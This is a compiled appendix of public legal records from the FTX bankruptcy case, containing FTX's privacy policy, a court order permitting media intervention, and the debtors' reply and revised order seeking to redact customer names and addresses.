You have certain choices about your personal information. Where you have consented to the processing of your personal information, you may withdraw that consent at any time and prevent further processing by contacting us as described below. Even if you opt out, we may still collect and use non- personal information regarding your activities on our Services and for other legal purposes as described above.

**Email and Telephone Communications**

If you receive an unwanted email from us, you can use the unsubscribe link found at the bottom of the email to opt out of receiving future emails. Note that you will continue to receive transaction-related emails regarding products or Services you have requested. We may also send you certain non-promotional communications regarding us and our Services, and you will not be able to opt out of those communications (e.g., communications regarding the Services or updates to our Terms or this Privacy Policy).

We process requests to be placed on do-not-mail, do-not-phone and do-not-contact lists as required by applicable law.

**Mobile Devices**

We may send you push notifications through our mobile application. You may at any time opt- out from receiving these types of communications by changing the settings on your mobile device. We may also collect location-based information if you use our mobile applications. You may opt-out of this collection by changing the settings on your mobile device.

**"Do Not Track."**

Do Not Track ("DNT") is a privacy preference that users can set in certain web browsers. Please note that we do not respond to or honor DNT signals or similar mechanisms transmitted by web browsers.

**Cookies and Interest-Based Advertising**

You may stop or restrict the placement of Technologies on your device or remove them by adjusting your preferences as your browser or device permits. The online advertising industry also provides websites from which you may opt out of receiving targeted ads from data partners and other advertising partners that participate in self-regulatory programs. You can access these and learn more about targeted advertising and consumer choice and privacy,

**A0105**

at [http://www.networkadvertising.org/managing/opt_out.asp](http://www.networkadvertising.org/managing/opt_out.asp), [http://www.youronlinechoices.eu/](http://www.youronlinechoices.eu/), and [http://www.aboutads.info/choices/](http://www.aboutads.info/choices/).  To separately make choices for mobile apps on a mobile device, you can download DAA's AppChoices application from your device's app store.  Alternatively, for some devices you may use your device's platform controls in your settings to exercise choice.

Please note you must separately opt out in each browser and on each device.  Advertisements on third party websites that contain the AdChoices link may have been directed to you based on information collected by advertising partners over time and across websites.  These advertisements provide a mechanism to opt out of the advertising partners' use of this information for interest-based advertising purposes.

**Your Privacy Rights**

In accordance with applicable law, you may have the right to:

- **Access personal information** about you consistent with legal requirements including: (i) confirming whether we are processing your personal information; (ii) obtaining access to or a copy of your personal information in a structured, commonly used, and machine readable format; and (iii) receiving an electronic copy of personal information that you have provided to us, or asking us to send that information to another company in a structured, commonly used, and machine readable format (the "right of data portability").

- **Request correction** of your personal information where it is inaccurate or incomplete. In some cases, we may provide self-service tools that enable you to update your personal information or we may refer you to the controller of your personal information who is able to make the correction.

- **Request deletion** of your personal information, subject to certain exceptions prescribed by law.

- **Request restriction of or object to** processing of your personal information, including the right to opt in or opt out of the sale of your personal information to third parties, if applicable, where such requests are permitted by law.

- **Withdraw your consent** to our processing of your personal information.

If you would like to exercise any of these rights, please log into your account or contact us as set forth below.  We will process such requests in accordance with applicable laws.  To protect your privacy, we will take steps to verify your identity before fulfilling your request.

5. DATA RETENTION

A0106

We store the personal information we receive as described in this Privacy Policy for as long as you use our Services or as necessary to fulfill the purpose(s) for which it was collected,

provide our Services, resolve disputes, establish legal defenses, conduct audits, pursue legitimate business purposes, enforce our agreements, and comply with applicable laws.

## 6. SECURITY OF YOUR INFORMATION

We take steps to ensure that your information is treated securely and in accordance with this Privacy Policy. Unfortunately, no system is 100% secure, and we cannot ensure or warrant the security of any information you provide to us. To the fullest extent permitted by applicable law, we do not accept liability for unintentional disclosure.

By using the Services or providing personal information to us, you agree that we may communicate with you electronically regarding security, privacy, and administrative issues relating to your use of the Services. If we learn of a security system's breach, we may attempt to notify you electronically by posting a notice on the Services, by mail or by sending an e-mail to you.

## 7. INTERNATIONAL DATA TRANSFERS

All information processed by us may be transferred, processed, and stored anywhere in the world, which may have data protection laws that are different from the laws where you live. We endeavor to safeguard your information consistent with the requirements of applicable laws.

If we transfer personal information to countries outside the European Economic Area, we will put in place appropriate safeguards to ensure that this transfer complies with the applicable laws and regulations. For more information about these safeguards, please contact us as set forth below.

## 8. CHILDREN'S INFORMATION

The Services are not directed to children under 18 (or other age as required by local law), and we do not knowingly collect personal information from children. If you learn that your child has provided us with personal information without your consent, you may contact us as set forth below. If we learn that we have collected any personal information in violation of applicable law, we will promptly take steps to delete such information and terminate the child's account.

## 9. SUPERVISORY AUTHORITY

If you are located in the European Economic Area or the UK, Switzerland or Brazil you have the right to lodge a complaint with a supervisory authority if you believe our processing of

**A0107**

the right to lodge a complaint with a supervisory authority if you believe our processing of your personal information violates applicable law.

## 10. CHANGES TO OUR PRIVACY POLICY

We may revise this Privacy Policy from time to time in our sole discretion.  If there are any material changes to this Privacy Policy, we will notify you as required by applicable law. You understand and agree that you will be deemed to have accepted the updated Privacy Policy if you continue to use the Services after the new Privacy Policy takes effect.

## 11. CONTACT US

If you have any questions about our privacy practices or this Privacy Policy, or if you wish to submit a request to exercise your rights as detailed in this Privacy Policy, please contact us at:

FTX Trading Ltd.

Lower Factory Road; Box 990
St. John's, Antigua

privacy@ftx.com

← Previous

Jurisdiction, regulations, licensing, and practices

Next →

FTX Terms of Service

**ARTICLES IN THIS SECTION**

How To Contact Us

Copyright Information

Security Policy

Location Restrictions

Jurisdiction, regulations, licensing, and practices

**Privacy Policy**

FTX Terms of Service

FTX Australia Legal

Notice for UK Customers



**A0108**

**RELATED ARTICLES**

FTX Terms of Service

Security Policy

Contact Us

Fees

How To Contact Us

---

**PROMOTED ARTICLES**

Introducing New Fee and Ratelimit Tiers to the FTX VIP & Market Maker Program

Deposit to your FTX account to earn VIP status

VIP Program and Market Maker Policy

FTX partners with Paradigm for one-click futures spreads trading

### Didn't find what you were looking for?

Create a support ticket

### Community

   

### Was this article helpful?

| Yes | No |
|-----|-----|

1 out of 1 found this helpful

**A0109**



English (US) ˅

FTX Services and FTX Token (FTT) are not available in the United States or other prohibited jurisdictions



A0110

**IN THE UNITED STATES BANKRUPTCY COURT
FOR THE DISTRICT OF DELAWARE**

| | | |
|---|---|---|
| In re: | ) | Chapter 11 |
| | ) | Case No. 22-11068 (JTD) |
| FTX TRADING LTD., *et al.*, | ) | (Joint Administration Pending) |
| | ) | |
| Debtors. | ) | |

**ORDER GRANTING CERTAIN MEDIA PARTIES' EXPEDITED
MOTION TO INTERVENE FOR THE LIMITED PURPOSE OF
PRESENTING AN OBJECTION TO DEBTORS' MOTION FOR ENTRY
OF A FINAL ORDER AUTHORIZING THE DEBTORS TO REDACT OR
WITHHOLD CERTAIN CONFIDENTIAL INFORMATION
OF CUSTOMERS AND PERSONAL INFORMATION OF INDIVIDUALS**

On this 19th day of December, 2022, after a hearing at which there was no objection to the Expedited Motion To Intervene For The Limited Purpose Of Presenting An Objection To Debtors' Motion For Entry Of A Final Order Authorizing The Debtors To Redact Or Withhold Certain Confidential Information Of Customers And Personal Information Of Individuals (D.I. 45),

IT IS HEREBY ORDERED that the Motion to Intervene of Bloomberg, Inc., Dow Jones & Company, New York Times, Inc. and The Financial Times Ltd. (collectively, the "Media Intervenors") is GRANTED. The Media Intervenors are permitted to intervene for the limited purpose of presenting an objection to Debtors' motion for entry of a final order authorizing the debtors to redact or withhold certain confidential information of customers and personal information of individuals.

**Dated: December 19th, 2022
Wilmington, Delaware**

JOHN T. DORSEY
UNITED STATES BANKRUPTCY JUDGE

**A0111**

# IN THE UNITED STATES BANKRUPTCY COURT
## FOR THE DISTRICT OF DELAWARE

| | |
|---|---|
| In re: | Chapter 11 |
| FTX TRADING LTD., *et al.*,[1] | Case No. 22-11068 (JTD) |
| Debtors. | (Jointly Administered) |
| | **Ref Nos. 45, 157, 196, 200 & 362** |

## DEBTORS' REPLY IN SUPPORT OF MOTION FOR ENTRY OF AN ORDER AUTHORIZING DEBTORS TO REDACT OR WITHHOLD CERTAIN CONFIDENTIAL INFORMATION

FTX Trading Ltd. and its affiliated debtors and debtors-in-possession (collectively, the "Debtors") hereby file this reply (the "Reply") in further support of the *Motion of Debtors for Entry of Interim and Final Orders (I) Authorizing the Debtors to Maintain a Consolidated List of Creditors In Lieu of Submitting a Separate Matrix for Each Debtor, (II) Authorizing the Debtors to Redact or Withhold Certain Confidential Information of Customers and Personal Information of Individuals and (III) Granting Certain Related Relief* [D.I. 45] (the "Motion").[2]  In support of this Reply, the Debtors submit the concurrently filed declaration of Kevin M. Cofsky (the "Cofsky Declaration").  On December 9, 2022, Bloomberg L.P., Dow Jones & Company, Inc., The New York Times Company and The Financial Times Ltd. (collectively, the "Media Objectors") filed an expedited motion to intervene in order to

---

[1]  The last four digits of FTX Trading Ltd.'s and Alameda Research LLC's tax identification number are 3288 and 4063 respectively.  Due to the large number of debtor entities in these Chapter 11 Cases, a complete list of the Debtors and the last four digits of their federal tax identification numbers is not provided herein.  A complete list of such information may be obtained on the website of the Debtors' claims and noticing agent at https://cases.ra.kroll.com/FTX.

[2]  Capitalized terms not otherwise defined herein are to be given the meanings ascribed to them in the Motion.

A0112

object to the Motion [D.I. 196] (the "Media Objection").[3]  On December 12, 2022, the Office of

the United States Trustee for the District of Delaware (the "U.S. Trustee" and, together with the

Media Objectors, the "Objectors") also filed an objection to the Motion [D.I. 200] (the "UST

Objection").  On January 4, 2023, the U.S. Trustee filed a supplemental objection [D.I. 362] (the

"Supplemental UST Objection" and, together with the Media Objection and UST Objection, the

"Objections").[4]

## Preliminary Statement

1.      These Chapter 11 Cases are unprecedented, and the Debtors recognize that

they have generated significant public interest.  The Debtors are committed to conducting a

transparent chapter 11 process for the Debtors' creditors and other parties-in-interest.  The

Debtors have an obligation, however, to balance transparency with both maximizing the value of

their assets, including the approximately 9.5 million customer names and contact information

contained in the Debtors' customer lists, and not unnecessarily increasing the potential risks to

the Debtors or their creditors by disclosing their personal information.

2.      The Objectors recognize this to a large degree.  The U.S. Trustee does not

object to redacting the addresses of individual customers and other individual creditors, and the

Media Objectors do not object to the redaction of the addresses and contact information of all

---

[3]     On December 19, 2022, the Court entered the *Order Granting Certain Media Parties' Expedited Motion to Intervene for the Limited Purpose of Presenting an Objection to Debtors' Motion for Entry of a Final Order Authorizing the Debtors to Redact or Withhold Certain Confidential Information of Customers and Personal Information of Individuals* [D.I. 255] authorizing the Media Objectors to intervene in these Chapter 11 Cases for the limited purpose of objecting to the Motion.

[4]     The Supplemental Objection only objects to the Motion to the extent that the Order authorizes the Debtors to redact the same information in professional retention applications or related disclosures.  (*See* Supp. UST Obj. ¶ 7.)  The Supplemental Objection does not advance any new or additional arguments.  The Debtors submit that there is no basis to treat redactions in in professional retention applications or disclosures differently than redactions in all other similar lists the Debtors file with this Court.

creditors.  The Objectors only contest the portion of the Motion seeking to also redact any customer or creditor names and, with respect to the U.S. Trustee, the addresses of non-individuals.

3.  The Objectors cite to the general principles of the right of public access to records, but do not articulate any bona fide reason why public disclosure of 9.5 million names *immediately*—in the still early stages of these Chapter 11 Cases—is necessary or appropriate.  And the Objectors simply dismiss this Court's sound reasoning in *In re Cred, Inc.*, where redaction of *both* names and associated identifying information of a cryptocurrency platform's customers was permitted.  There is no basis to reach a different result on the facts of these cases; in fact, the need to redact the names and identifying information of the Debtors' customers is that much more acute here where the sheer number of customers—and potential value of the Debtors' customer lists—is so significant.

4.  The facts of these cases support two independent bases for the Court to permit redactions for cause of *both* customer names and address information:  (i) section 107(b) of the Bankruptcy Code, to permit the Debtors a reasonable period of time to reorganize or monetize their digital asset exchanges, which include their customer lists, without the threat of poaching before publicly releasing names; and (ii) section 107(c) of the Bankruptcy Code, to protect customers from bad actors, theft and fraud.

5.  In order to strike an appropriate balance, the Debtors, with the support of the Official Committee of Unsecured Creditors (the "Committee"), are limiting the relief requested on a final basis to permitting the redaction of names of the Debtors' customers for a period of 6 additional months pursuant to section 107(b) of the Bankruptcy Code, subject to the right of the Debtors and the Committee to seek from the Court an extension of the period or

A0114

authorization to redact customer names on other grounds at a later date.[5]  This will address the immediate issue and permit the Debtors to preserve the value of the customer lists as they work to maximize value for all stakeholders.

6.     If redaction of customer names is granted on this basis, then the Debtors are not requesting that the Court adjudicate the propriety of redacting customer names pursuant to section 107(c) of the Bankruptcy Code at this time.[6]

7.     In addition, the Debtors do maintain their request to redact all names—customer and otherwise—to comply with the GDPR.  The UST Objection deviates from longstanding precedent in this district of redacting information (including names and addresses) protected by the GDPR and objects to names being redacted on that basis despite the risk to the Debtors of significant penalties.  The Court should not countenance this newfound position.

8.     Accordingly, the Debtors request that the Court overrule the Objections and grant the relief requested, as modified herein.[7]

**<u>Reply</u>**

I.  **Cause Exists to Authorize the Debtors to Redact Customer Names and Contact Information Pursuant to Section 107(b)(1) of the Bankruptcy Code**

9.     The Debtors maintain that cause exists pursuant to section 107(b)(1) of the Bankruptcy Code and Bankruptcy Rule 9018 to authorize the Debtors to redact the names and

---

[5]     A revised proposed Order (the "<u>Revised Order</u>") is attached hereto as <u>Exhibit 1</u>.  A redline of the Revised Order against the original Order filed with the Motion is attached hereto as <u>Exhibit 2</u>.

[6]     To the extent the Court is not inclined to grant the Motion under section 107(b) and order the redaction of customer names for the next 6 months, the Debtors respectfully request that the hearing be adjourned to a later date to provide the Debtors an opportunity to permit additional briefing and evidence with respect to section 107(c).

[7]     The relief requested in the Motion is not intended to exempt any customer or equity holder from the disclosure requirements set forth in Bankruptcy Rule 2019.  The Debtors believe that prompt compliance with Bankruptcy Rule 2019 is important, where applicable.

associated identifying information of the Debtors' customers because the Debtors' customer lists are a potentially valuable asset of the estates precisely because they are proprietary and not publicly available. (*See* Mot. ¶¶ 11-15.) Mr. Cofsky makes clear that the Debtors' customer lists, including both names and contact information, are a key asset and a potential source of value for the Debtors' estates. (Cofsky Decl. ¶¶ 7-9.) The UST Objection does not dispute that immediately revealing the Debtors' customer lists could harm the Debtors' ability to market and sell those lists as part of their reorganization efforts, but rather argues that section 107(b) is inapplicable, the Debtors have failed to meet their burden, and there are countervailing considerations that favor disclosure. (*See* UST Obj. ¶¶ 53-55; Media Obj. ¶¶ 16-17.)

10. The Debtors recognize that, with respect to section 107(b)(1), the interest of the Debtors in protecting the value of their assets must be balanced with the transparency required by the chapter 11 process. To that end, and in response to the U.S. Trustee's concerns, the Debtors are limiting their request to redact customer names and institutional addresses, in addition to the agreed redaction of individual customer address information, to a period of an additional 6 months, subject to the rights of the Debtors and the Committee to seek an extension of that period. The Debtors' submit that this modified request appropriately balances the competing interests at this early stage of these Chapter 11 Cases.

11. Moreover, the Debtors are not seeking to avoid compliance with the Bankruptcy Code and the Bankruptcy Rules. They will serve all of the necessary parties and make all of the necessary disclosures under seal to the Court, the U.S. Trustee, and others as appropriate.[8]

---

[8] The U.S. Trustee also objects to the Motion on the basis that the Order does not require the Debtors to file unredacted documents under seal with the Court. (UST Obj. ¶¶ 82-84.) For the avoidance of doubt, the Debtors will file redacted documents publicly and will file unredacted versions under seal with the Court.

12.     Contrary to the Objectors' assertions, the Debtors have satisfied their burden in establishing that the customer lists are confidential "commercial information" that warrants protection under section 107(b)(1), particularly given that the current request to redact customer names and institutional addresses is for a limited duration.

13.     Mr. Cofsky confirms that the Debtors' customer lists are a key asset of their estates.  (Cofsky Decl. ¶¶ 6-7.)  The Debtors have expended significant resources to build their customer lists over time, and Mr. Cofsky confirms that he believes third parties will attribute value to those lists, including both names and customer information.  (*Id.* ¶ 8.)  Given that a hallmark feature of cryptocurrency is a holder's ability to remain anonymous to the public, there is limited to no publicly available information as to the identity of individuals or institutions holding cryptocurrency on exchanges.  (*Id.* ¶ 7.)  As a result, it is expensive and time consuming for companies that operate crypto asset management platforms to identify potential customers, attract and enroll them, and ultimately establish them as customers.  It is likewise generally difficult for a crypto asset management platform to identify customers on a competitor's platform and seek to poach those customers.  (*Id.*)

14.     But that asset comprising of more than 9 million customers, and the ability to monetize it for the benefit of all stakeholders, would be jeopardized by its immediate disclosure.  (*Id.* ¶ 13.)  And the Debtors would be harmed by the disclosure of the customer names, even with the redaction of addresses.  (*Id.* ¶ 9.)

15.     It is well established that customer information such as names and contact information are separately valued intangible assets of an entity.  (*Id.* ¶ 12.)  Mr. Cofsky's views with respect to the Debtors' customers here are validated by the fact that crypto asset management platforms, including competitors of the Debtors, and businesses in general,

regularly expend significant value for new customers in the ordinary course of business. (*Id.* ¶ 10.) The fact that the Debtors' customer lists contain more than 9 million names and addresses in one place only increases that value. Critically, from the perspective of the Debtors' stakeholders, potential buyers of the Debtors' assets will likely ascribe material value to the Debtors' customer lists. But if customer information is made public, the value of the Debtors' businesses, and the ability to realize that value, could be materially harmed, diminished or dissipated. (*Id.* ¶ 11.)

16.     The conclusion of Mr. Cofsky—the person who, along with his team at the Debtors' proposed investment banker, is considering how to maximize value of certain of the Debtors' assets—is that an important component of the strategy is maintaining the confidentiality of customers' identities and personal identifying information. (*Id.* ¶ 13.) These Chapter 11 Cases are still in their early stages, and there is no reason advanced by the Objectors to force the Debtors' to destroy that value at this juncture. The Debtors should be permitted the requested period of an additional 6 months to continue to consider all reorganization and marketing options.

17.     There is additional cause to redact individual customers names pursuant to section 107(b)(1) to comply with the Act on the Protection of Personal Information ("APPI") and the Financial Instruments and Exchange Act of Japan ("FIEA"). Under the APPI, a business operator handling personal information, like certain of the Debtors, is prohibited from disclosing such information without the consent of the individual or unless certain statutory exceptions apply. APPI Arts. 27(1), 28(1). "Personal information" includes an individual's name. APPI Art. 2(1). While there is a statutory exception for disclosure if it is required by law, this exception does not apply where the applicable law is foreign law. APPI Art. 27(1). Violations

of the APPI could also result in business suspension or the revocation of a business license. FIEA Arts. 51, 52(1). This business license in Japan is another crucial asset of the Debtors' estates in their ongoing reorganization efforts, and the Debtors are currently seeking approval of bid procedures to market the FTX Japan business. It is therefore paramount that the Debtors be permitted to comply with the APPI in order to protect this asset and those customers in Japan.

18. This Court has already determined under substantially similar facts that a crypto platform's customer list is entitled to protection under section 107(b) of the Bankruptcy Code. In *Cred*, the Court overruled an objection from the U.S. Trustee and concluded that those debtors' customer list "has some intrinsic value, and that disclosure of that list could affect the ability of the debtors to market and sell that list as part of their going toward a plan of reorganization." *In re Cred Inc.*, No 20-12836 (JTD) (Dec. 18, 2020) [D.I. 277] (Dec. 18, 2020 Hr'g Tr. ("Cred Hr'g Tr.") at 113:23-25, 114:1-3.) That conclusion is even clearer here, where the Debtors have more than 9 million customers on their customer lists (*see* Cofsky Decl. ¶ 8) compared to 6,500 customers in *Cred* (*see* Cred Hr'g Tr. at 108:20-21.). The value of the Debtors' customer lists will likely have material value if maintained as confidential. (Cofsky Decl. ¶ 10.) In addition, the Debtors are requesting relief for only a limited period of 6 months, subject to the right to come back to the Court and seek an extension of the time period.

19. The U.S. Trustee's assertion that "it is difficult to imagine" how disclosure of names could allow competitors to poach the Debtors' customers (UST Obj. ¶ 60) rings hollow. Anyone with access to a computer and an internet search browser could undoubtedly find a significant number of addresses and thus customer leads if provided the opportunity to mine more than 9 million names worldwide. It is not only easy to imagine how the Debtors would be harmed; Mr. Cofsky confirms that many valuable customers could be located through

internet searches or otherwise by names alone, and the publication of this information would substantially harm the value of the Debtors' assets and undermine their ability to obtain the highest and best value for those assets. (Cofsky Decl. ¶ 9.) The Court in *Cred* recognized that "the goal . . . is to keep [the customer list] out of the hands of competitors." Cred Hr'g Tr. at 114:3, 9-10. The U.S. Trustee offers only a conclusory statement inviting a different conclusion here, which should be rejected.

  20. In addition, the U.S. Trustee's reliance on the FTX Trading Ltd. Privacy Policy is misguided. The U.S. Trustee asserts that the customer list "is not secret or confidential" because the Privacy Policy provides that FTX Trading Ltd. may disclose the information to others. (UST Obj. ¶¶ 58-59). This is wrong. To the contrary, FTX Trading Ltd.'s Privacy Policy contemplates only that, in the event of a sale, merger or reorganization, "*information may be sold or transferred as part of such a transaction*." That language contemplates transfer to a buyer, not public disclosure. Similarly, the provision permitting disclosure *if required* to comply with law enforcement or legal process plainly contemplates maintaining confidentiality where possible. There is nothing in the Privacy Policy, which is only applicable to certain of the Debtors, that is inconsistent with the Debtors seeking to maintain the confidentiality of the customer lists as assets of the estates.

  21. Finally, the U.S. Trustee posits, without any evidence, that the redaction of customer names and institutional customer addresses would somehow prevent the proper administration of these Chapter 11 Cases. (UST Obj. ¶ 55.) Not so. All necessary information will be provided to individual creditors, and all parties-in-interest retain the right to seek copies of any redacted document from the Debtors or, if necessary, the Court. Any concern is further mitigated by the proposed time period for redactions being limited at this time to 6 months. This

A0120

avoids the need, for example, to address redaction of the customer names from documents filed in connection with customer claims or related claims administration matters.

22.     The Debtors' limited request for relief pursuant to section 107(b)(1) of the Bankruptcy Code should be granted.

## II.     Section 107(c)(1) Provides an Independent Basis to Redact All Customer Names and Addresses

23.     As set forth in the Motion, the Debtors believe that cause exists to redact all customer names and addresses pursuant to section 107(c)(1) of the Bankruptcy Code. However, this question and the embedded one of permanently sealing all customer names and institutional customer addresses need not be addressed or resolved by the Court at this time if the Debtors' request to redact for the next 6 months pursuant to section 107(b)(1) is granted.  The Debtors reserve all rights with respect to section 107(c) and otherwise.

## III.     Cause Exists to Authorize the Debtors to Redact Individual Creditor and Equity Holder Names and Addresses Pursuant to the GDPR

24.     The Debtors submit that there is also cause to authorize the redaction of individual non-customer creditor and equity holder names to comply with the GDPR.  The Objectors' assertion that the Debtors should not be authorized to comply with the requirements of the GDPR should be rejected.  Failure to comply with the GDPR would subject the Debtors to substantial potential fines and penalties to the detriment of the estates and the Debtors' creditors.

25.     *First*, the GDPR plainly applies to the Debtors.  The U.S. Trustee acknowledges (UST Obj. ¶ 39) that the Debtors are "data controllers" under the GDPR.  GDPR Art. 4(7).  Pursuant to Article 6 of the GDPR, the Debtors must therefore have a legal basis to process the personal data of EU or UK data subjects.  GDPR Art. 6(1).  "Personal data" includes "any information relating to an identified or identifiable natural person."  GDPR Art. 4(1). While the U.S. Trustee notes that processing of personal data is lawful if it is "necessary for

compliance with a legal obligation to which the controller is subject" (UST Obj. ¶ 42 (citing GDPR Art. 6(1))), the U.S. Trustee ignores that any such legal obligation "should have a basis in Union or Member State law"—not U.S. law.  GDPR Art. 6(1), Recital 45.  None of the other legal bases for processing data contained in Article 6 apply here.

26.      The U.S. Trustee argues that the GDPR "facially appears to permit the disclosure" of the personal data of covered individuals because the "transfer" is "necessary for the establishment, exercise or defence of legal claims."  (UST Obj. ¶ 76 (citing GDPR Art. 49(1)(e)).)  This argument conflates "processing" and "transferring," which are subject to separate and independent requirements in the GDPR.  The "Legal Claim Exception" contained in Article 49 of the GDPR applies only to the *transfer* of personal data from an EU member state or the UK to another country.  *See* GDPR Art. 49.  It does not provide an independent basis for a company subject to the GDPR to *process* personal data under Article 6 of the GDPR, which includes public disclosure.  Rather, Article 6 of the GDPR explicitly states that processing "shall be lawful only if and to the extent that at least one of the" legal bases set out in Article 6 applies.  *See* GDPR Art. 6.  The Legal Claim Exception is not one of those listed legal bases.

27.      Violations of the GDPR come with substantial potential fines.  (*See* Mot. ¶ 20 n.4.)  It is of course easy for the Media Objectors—entities with no economic stake in these Chapter 11 Cases—to dismiss the tens of millions of dollars of value that would potentially be lost if the Debtors are not authorized to redact the names of individual creditors covered by the GDPR.  (Media Obj. ¶ 20.)  The Debtors, on behalf of their estates and stakeholders who have an interest in recovering on their claims, do not want to see assets dissipated in such manner.  The

Debtors believe that the redaction of names protected by the GDPR is in the best interests of the Debtors, their estates and their creditors.[9]

28. *Second*, the risks to the Debtors of non-compliance, combined with the expectation of privacy among protected individual customers, have historically resulted in this type of relief being routinely granted as a matter of course by this Court and other courts in this district. *See, e.g.*, *In re Mallinckrodt Plc*, No. 20-12522 (JTD) (Nov. 14, 2020), D.I. 464 (authorizing the redaction of names and addresses of individuals protected by the GDPR); *In re Glob. Eagle Ent. Inc.*, No. 20-11835 (JTD) (July 23, 2020), D.I. 76 (same); *In re Alex and Ani, LLC*, No. 21-10918 (CTG) (June 11, 2021), D.I. 62 (authorizing debtors to redact names and addresses of any natural person whose personally identifiable information has been provided to an organization with an establishment in the United Kingdom or a European Economic Area member state); *In re Highpoint Res. Corp.*, No. 21-10565 (CSS) (Mar. 16, 2021), D.I. 78 (same); *In re Extraction Oil & Gas, Inc.*, No. 20-11548 (CSS) (July 13, 2020), D.I. 243 (authorizing the redaction of names and addresses of individuals protected by the GDPR); *In re Akorn, Inc.*, No. 20-11177 (KBO) (May 22, 2020), D.I. 74 (same); *In re Clover Techs. Grp., LLC*, No. 19-12680 (KBO) (Feb. 4, 2020), D.I. 155 (same).

29. The U.S. Trustee invites this Court to reverse course based on language contained in the court's opinion in *Celsius* denying related relief. *See In re Celsius Network, LLC*, 644 B.R. 276 (Bankr. S.D.N.Y. 2022). The Debtors respectfully disagree with the conclusion reached in that case denying the request to redact customer names, including under the GDPR. The Objectors provide no basis for this Court to abandon its prior rulings. Rather,

---

[9] The Debtors reserve all rights with respect to seeking to permanently redact names of creditors who are citizens of other countries with similar laws if subsequently advised by counsel to be necessary.

the Court should reaffirm the importance of compliance with the GDPR, consistent with the practice in this district.

30.     The Debtors are requesting that, supplementing the relief sought with respect to customers, they be permitted to permanently maintain redactions as to individual creditor and equity holder names for those who are citizens of countries protected by the GDPR.

### **Conclusion**

31.     For the reasons stated above, the Court should overrule the Objections, grant the modified relief requested herein, and enter the Revised Order.

A0124

Dated: January 8, 2023
Wilmington, Delaware

**LANDIS RATH & COBB LLP**

*/s/ Kimberly A. Brown*
Adam G. Landis (No. 3407)
Kimberly A. Brown (No. 5138)
Matthew R. Pierce (No. 5946)
919 Market Street, Suite 1800
Wilmington, Delaware 19801
Telephone: (302) 467-4400
Facsimile: (302) 467-4450
E-mail: landis@lrclaw.com
brown@lrclaw.com
pierce@lrclaw.com

-and-

**SULLIVAN & CROMWELL LLP**
Andrew G. Dietderich (admitted *pro hac vice*)
James L. Bromley (admitted *pro hac vice*)
Brian D. Glueckstein (admitted *pro hac vice*)
Alexa J. Kranzley (admitted *pro hac vice*)
125 Broad Street
New York, NY 10004
Telephone: (212) 558-4000
Facsimile: (212) 558-3588
E-mail: dietdericha@sullcrom.com
bromleyj@sullcrom.com
gluecksteinb@sullcrom.com
kranzleya@sullcrom.com

*Proposed Counsel for the Debtors*
*and Debtors-in-Possession*

**A0125**

**EXHIBIT 1**

**Revised Order**

# IN THE UNITED STATES BANKRUPTCY COURT
## FOR THE DISTRICT OF DELAWARE

| | |
|---|---|
| In re: | Chapter 11 |
| FTX TRADING LTD., *et al.*,[1] | Case No. 22-11068 (JTD) |
| Debtors. | (Jointly Administered) |
| | **Ref. Nos. 45 & 157** |

**FINAL ORDER (I) AUTHORIZING THE DEBTORS TO MAINTAIN A CONSOLIDATED LIST OF CREDITORS IN LIEU OF SUBMITTING A SEPARATE MATRIX FOR EACH DEBTOR, (II) AUTHORIZING THE DEBTORS TO REDACT OR WITHHOLD CERTAIN CONFIDENTIAL INFORMATION OF CUSTOMERS AND PERSONAL INFORMATION OF INDIVIDUALS ON A FINAL BASIS AND (III) GRANTING CERTAIN RELATED RELIEF**

Upon the motion (the "Motion")[2] of FTX Trading Ltd. and its affiliated debtors and debtors-in-possession (collectively, the "Debtors"), for entry of an order (this "Final Order") (a) authorizing the Debtors to (i) maintain the Creditor Matrix in lieu of submitting a separate creditor matrix for each Debtor and (ii) redact or withhold certain confidential information of customers and personal information of individuals, (b) establishing procedures for notifying the parties of the commencement of these Chapter 11 Cases and (c) granting related relief; and this Court having entered the *Interim Order (I) Authorizing the Debtors to Maintain A Consolidated List of Creditors in Lieu of Submitting a Separate Matrix for Each Debtor, (II) Authorizing the Debtors to Redact or Withhold Certain Confidential Information of Customers and Personal Information of Individuals on an Interim Basis and (III) Granting Certain Related Relief* [D.I. 157]; and this Court having jurisdiction to consider the Motion pursuant to 28 U.S.C. §§ 157 and

---

[1] The last four digits of FTX Trading Ltd.'s and Alameda Research LLC's tax identification number are 3288 and 4063 respectively. Due to the large number of debtor entities in these Chapter 11 Cases, a complete list of the Debtors and the last four digits of their federal tax identification numbers is not provided herein. A complete list of such information may be obtained on the website of the Debtors' claims and noticing agent at https://cases.ra.kroll.com/FTX.

[2] Capitalized terms not otherwise defined herein are to be given the meanings ascribed to them in the Motion.

1334 and the *Amended Standing Order of Reference* from the United States District Court for the

District of Delaware, dated February 29, 2012; and this Court being able to issue a final order

consistent with Article III of the United States Constitution; and venue of these Chapter 11 Cases

and the Motion in this district being proper pursuant to 28 U.S.C. §§ 1408 and 1409; and this

matter being a core proceeding pursuant to 28 U.S.C. § 157(b); and this Court having found that

proper and adequate notice of the Motion and the relief requested therein has been provided in

accordance with the Bankruptcy Rules and the Local Rules, and that, except as otherwise ordered

herein, no other or further notice is necessary; and objections (if any) to the Motion having been

withdrawn, resolved or overruled on the merits; and a hearing having been held to consider the

relief requested in the Motion and upon the record of the hearing and all of the proceedings had

before this Court; and this Court having found and determined that the relief sought in the

Motion is in the best interests of the Debtors, their estates, and their creditors; and that the legal

and factual bases set forth in the Motion establish just cause for the relief granted herein; and

after due deliberation and sufficient cause appearing therefor;

        IT IS HEREBY ORDERED THAT:

1.      The Motion is GRANTED on a final basis as set forth herein.

2.      The requirements of Local Rules 1007(a)(2) and 2002-1(f)(v) that separate

mailing matrices be submitted for each Debtor are waived, and the Debtors are authorized to

submit a consolidated list of creditors; *provided* that if any of these Chapter 11 Cases converts to

a case under chapter 7 of the Bankruptcy Code, the applicable Debtor shall file its own creditor

mailing matrix.

3.      The Debtors shall cause such list to be made available in readable electronic format (or in non-electronic format at such requesting party's sole cost and expense) upon reasonable request by parties-in-interest.

4.      The Debtors are authorized, on a final basis, pursuant to section 107(b)(1) of the Bankruptcy Code, to redact the names, addresses and e-mail address of their customers from any filings with the Court or made publicly available in these Chapter 11 Cases, *provided, however*, that the authorization to redact the names of customers and the addresses of institutional customers is only until the date that is 180 days from the date of the entry of this Order (such date, the "Redaction Deadline").

5.      The Debtors are authorized, on a final basis, to redact (a) the addresses and e-mail addresses of their individual creditors and individual equity holders, and (b) the name, addresses and e-mail address of any individual creditors or individual equity holders who are citizens of the United Kingdom or any European Union member country, from any filings with the Court or made publicly available in these Chapter 11 Cases.

